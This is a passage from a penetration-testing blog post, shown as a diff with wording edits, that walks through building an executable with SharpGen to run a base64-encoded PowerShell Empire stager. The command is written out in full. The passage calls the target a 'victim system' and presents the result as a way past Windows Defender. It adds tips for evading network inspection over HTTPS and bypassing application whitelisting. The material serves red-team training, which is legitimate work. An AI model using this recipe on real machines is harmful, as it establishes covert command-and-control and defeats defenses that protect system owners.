 Our initial goal can be accomplished by building an executable that will run a PowerShell one-liner to establish a C2 connection with Empire.
 We generate the one-liner using the multi/launcher stager in PowerShell Empire (some hints on how to do that here).
 All we need is the resulting base64 string to copy and paste into the following command.

 dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f Launcher.exe -d net40 "Console.WriteLine(Shell.PowerShellExecute(\"$c = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('<BASE64_LAUNCHER>')); invoke-expression -command $c\"));"

 Replace <BASE64_LAUNCHER> with the base64 string output produced by Empire’s multi/launcher (the stuff after “powershell -noP -sta -w 1 -enc”, including any equals signs at the end).

 You will find Launcher.exe in the Output directory.
 Move this to your victim system and voila!
 You have gotten past Windows Defender.

-However, this is probably not the only defense in a corporate environment that you need to get past.
+However, in a corporate environment, this is probably not the only defense you need to get past.
 For example, there may be network defenses that will inspect the network traffic and shutdown the communication.
 Here are some tips for success.

 - Use HTTPS communications over port 443, using valid (not self-signed) certificates.
 More information on how to set this up with Empire is located here.

-- If application whitelisting is in play, preventing you from running random executables, try one of many application whitelisting bypasses.
+- If application whitelisting is in play and preventing you from running random executables, try one of many application whitelisting bypasses.
 Here is one example by @fullmetalcache that I’ve used successfully in the past.

 — Thanks to Carrie for another awesome guest blog post here on the BHIS Blog!